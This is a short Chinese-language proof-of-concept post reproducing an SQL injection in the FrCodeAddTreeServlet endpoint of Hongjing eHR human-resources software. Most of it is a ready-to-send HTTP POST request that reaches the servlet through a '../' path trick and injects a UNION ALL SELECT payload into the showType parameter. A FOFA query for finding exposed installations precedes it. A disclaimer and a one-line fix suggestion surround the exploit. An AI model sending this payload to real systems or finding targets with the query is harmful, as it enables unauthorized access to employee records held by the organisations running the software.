宏景eHR FrCodeAddTreeServlet SQL注入漏洞复现

前言

免责声明：请勿利用文章内的相关技术从事非法测试，由于传播、利用此文所提供的信息或者工具而造成的任何直接或者间接的后果及损失，均由使用者本人负责，所产生的一切不良后果与文章作者无关。该文章仅供学习用途使用。

---

一、产品简介

宏景eHR是一款面向国有企事业单位的人力资源管理数智化软件产品，旨在帮助企业实现人力资源的数字化和智能化管理。

二、漏洞描述

该系统FrCodeAddTreeServlet接口存在SQL注入漏洞

三、影响范围

未知

四、复现环境

FOFA：app=“HJSOFT-HCM”

五、漏洞复现

1.访问存在漏洞的网站，抓包

2.测试payload

POST /templates/attestation/../../servlet/FrCodeAddTreeServlet HTTP/1.1
Host: IP：port
User-Agent: Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/112.0.0.0 Safari/537.36
Content-Length: 132
Accept: */*
Accept-Encoding: gzip, deflate
Connection: keep-alive
Content-Type: application/x-www-form-urlencoded

params=&issuperuser=&parentid=&privType=&manageprive=&action=&target=&showType=1'+UNION+ALL+SELECT+123,NULL,NULL,NULL,NULL,NULL--+

3.成功

六、修复建议

及时更新系统，安装防护设备，过滤请求中的敏感字符